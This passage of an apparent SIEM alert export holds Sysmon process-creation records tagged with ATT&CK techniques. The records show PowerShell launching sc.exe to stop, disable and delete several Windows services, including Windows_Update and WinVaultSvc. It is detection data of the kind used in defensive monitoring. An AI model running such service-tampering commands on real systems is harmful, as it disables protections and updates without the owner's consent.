""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.664782900Z"",""eventRecordID"":""3838"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.660\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001034ae3000}\r\nProcessId: 5104\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:35.660"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001034ae3000}"",""processId"":""5104"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.890",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.625 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00109aac3000} +ProcessId: 1408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.628799000Z"",""eventRecordID"":""3836"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.625\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00109aac3000}\r\nProcessId: 1408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.625"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00109aac3000}"",""processId"":""1408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.865",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.603 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001095ab3000} +ProcessId: 5756 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.607610400Z"",""eventRecordID"":""3835"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.603\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001095ab3000}\r\nProcessId: 5756\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.603"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001095ab3000}"",""processId"":""5756"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.810",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.554 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00102aa93000} +ProcessId: 7832 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.560435800Z"",""eventRecordID"":""3832"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.554\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00102aa93000}\r\nProcessId: 7832\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.554"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00102aa93000}"",""processId"":""7832"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.746",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:52:35.500 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c0a63000} +ProcessId: 5272 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.507105300Z"",""eventRecordID"":""3829"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.500\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c0a63000}\r\nProcessId: 5272\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.500"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010c0a63000}"",""processId"":""5272"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.709",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.485 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010e5a53000} +ProcessId: 8032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Windows Managers"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Windows Managers\"" Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.488542900Z"",""eventRecordID"":""3828"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.485\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010e5a53000}\r\nProcessId: 8032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Windows Managers\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.485"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010e5a53000}"",""processId"":""8032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Windows Managers\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.671",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.452 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001057a43000} +ProcessId: 5384 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.455146500Z"",""eventRecordID"":""3826"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.452\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001057a43000}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: 